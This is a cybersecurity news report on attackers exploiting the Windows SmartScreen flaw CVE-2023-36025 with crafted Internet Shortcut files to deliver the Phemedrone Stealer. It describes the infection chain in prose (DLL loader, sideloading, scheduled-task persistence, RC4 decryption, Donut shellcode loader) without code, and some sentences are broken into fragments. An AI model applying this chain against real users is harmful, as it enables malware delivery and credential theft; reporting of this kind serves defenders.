Hackers actively target and exploit Windows Defender SmartScreen to deceive users and deliver malicious content by creating convincing, misleading websites or applications.
By evading SmartScreen, the threat actors increase the chances of their malicious content being executed on users' systems to compromise security.
This exploitation often involves the use of social engineering tactics to deceive users and bypass the protective features of SmartScreen.
CVE-2023-36025 in Microsoft Windows Defender SmartScreen allows threat actors to exploit.
The demo codes on social media revealed their use in malware campaigns, including one with a Phemedrone Stealer payload.Free Webinar.
Compounding the problem are zero-day vulnerabilities like the MOVEit SQLi, Zimbra XSS, and 300+ such vulnerabilities that get discovered each month.
To initiate Phemedrone Stealer, threat actors place malicious Internet Shortcut files on Discord or cloud services that are often disguised with URL shorteners.
Exploiting CVE-2023-36025 makes the users unknowingly open crafted.
Url files, which help in evading Windows Defender SmartScreen.
Executing the file connects to the attacker's server, downloading and executing a control panel item using a Windows shortcut to bypass SmartScreen.
002 the hackers use the Windows Control Panel process to execute a malicious DLL that acts as a loader.
Researchers discovered that the PowerShell commands led to the download of a ZIP file from GitHub containing three files.
Dll file decrypts the second stage loader for persistence by creating scheduled tasks.
Techniques like API hashing, string encryption, and VMProtect enhance the evasion mechanism.
The loader sideloads using DLL spoofing which is executed by WerFaultSecure.
Dynamic API resolves the hidden imports using CRC-32 hashing.
Pdf, decrypted using SystemFunction032 for RC4 decryption.
API callback functions redirect execution flow to the second stage by utilizing the CryptCATCDFOpen with the second stage's Entry Point.
The attacker deployed the Donut second-stage loader, an open-source shellcode enabling the execution of various file types in memory.
This case represents the connection between open-source malware and public exploits, highlighting the need for timely software updates and implementations of robust security solutions.
This Cyber News was published on cybersecuritynews.com. Publication date: Tue, 16 Jan 2024 13:25:04 +0000